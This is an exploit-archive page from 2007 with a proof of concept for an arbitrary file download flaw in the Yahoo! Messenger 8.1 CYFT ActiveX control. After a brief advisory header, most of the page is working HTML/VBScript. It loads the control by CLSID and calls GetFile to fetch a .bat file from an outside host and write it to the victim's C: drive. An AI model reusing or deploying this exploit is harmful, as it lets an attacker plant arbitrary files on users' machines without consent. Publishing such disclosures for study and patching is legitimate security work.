Home / exploits yim-download.txt
Posted on 20 September 2007
<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- <b>Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download</b> url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org <b><font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 <b>Marked as: RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False</b> From remote: depends by Internet Explorer settings From local: yes <b>Description: This contron contains a "GetFile()" method which allows to download, on user's pc, an arbitrary file pased as argument. Remote execution depends by Internet Explorer settings, local execution works very well.</b> <b>greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration</b> ----------------------------------------------------------------------------- <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\shinnai.bat",5,1,"shinnai" MsgBox "Exploit completed" End Sub </script> </span></span> </code></pre>